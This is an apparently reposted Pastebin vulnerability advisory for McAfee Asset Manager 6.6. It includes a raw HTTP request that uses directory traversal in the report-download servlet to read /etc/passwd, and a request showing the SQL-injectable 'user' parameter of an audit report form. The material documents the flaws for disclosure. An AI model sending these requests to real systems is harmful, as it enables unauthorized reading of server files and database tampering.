API tools faq
paste
Advertisement
Mayk0

#; McAfee Asset Manager 6.6 - Multiple Vulnerabilities

Mayk0
Mar 23rd, 2014
120
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.37 KB | None | 0 0
raw download clone embed print report
  1. Titulo completo McAfee Asset Manager 6.6 - Multiple Vulnerabilities
  2. Fecha 2014-03-19
  3. Categoria web applications
  4. Platforma jsp
  5.  
  6. =====================================
  7.  
  8. Cloud SSO is vuln to unauthed XSS in the authentication audit form:
  9.  
  10. https://twitter.com/BrandonPrry/status/445969380656943104
  11.  
  12. McAfee Asset Manager v6.6 multiple vulnerabilities
  13.  
  14. http://www.mcafee.com/us/products/asset-manager.aspx
  15.  
  16. Authenticated arbitrary file read
  17. An unprivileged authenticated user can download arbitrary files with the permissions of the web server using the report download functionality.
  18. By generating a report, the user's browser will make a request to /servlet/downloadReport?reportFileName=blah. The user can put in a relative directory traversal attack and download /etc/passwd.
  19.  
  20. GET /servlet/downloadReport?reportFileName=../../../../../../../../etc/passwd&format=CSV HTTP/1.1
  21. Host: 172.31.16.167
  22. User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
  23. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  24. Accept-Language: en-US,en;q=0.5
  25. Accept-Encoding: gzip, deflate
  26. Referer: https://172.31.16.167/Inventory?filterColumns=&curViewId=-1&maintainQuery=true&format=search&collectorId=null&criticality=0&pageNum=1&location=Inventory&viewSelect=-999999&filterValueField=&orderBy=FIREWALLED&orderBy2=SITE&orderBy3=CRITICALITY_NAME&wsz=200&wszCtrl_1=200&action=AUDIT_REDISCOVER&formatSelect=
  27. Cookie: JSESSIONID=F92156C7962D8276FC4BF11CEA8FB554
  28. Connection: keep-alive
  29.  
  30.  
  31. Authenticated SQL injection
  32.  
  33. An unprivileged authenticated user can initiate a SQL injection attack by creating an audit report and controlling the username specified in the audit report. In the below request, the 'user' parameter is susceptible to the SQL injection:
  34.  
  35. POST /jsp/reports/ReportsAudit.jsp HTTP/1.1
  36. Host: 172.31.16.167
  37. User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
  38. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  39. Accept-Language: en-US,en;q=0.5
  40. Accept-Encoding: gzip, deflate
  41. Referer: https://172.31.16.167/jsp/reports/ReportsAudit.jsp
  42. Cookie: JSESSIONID=F92156C7962D8276FC4BF11CEA8FB554
  43. Connection: keep-alive
  44. Content-Type: application/x-www-form-urlencoded
  45. Content-Length: 91
  46.  
  47. fromDate=03-19-2014&toDate=03-19-2014&freetext=&Severity=0&AuditType=12&user=Administrator
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!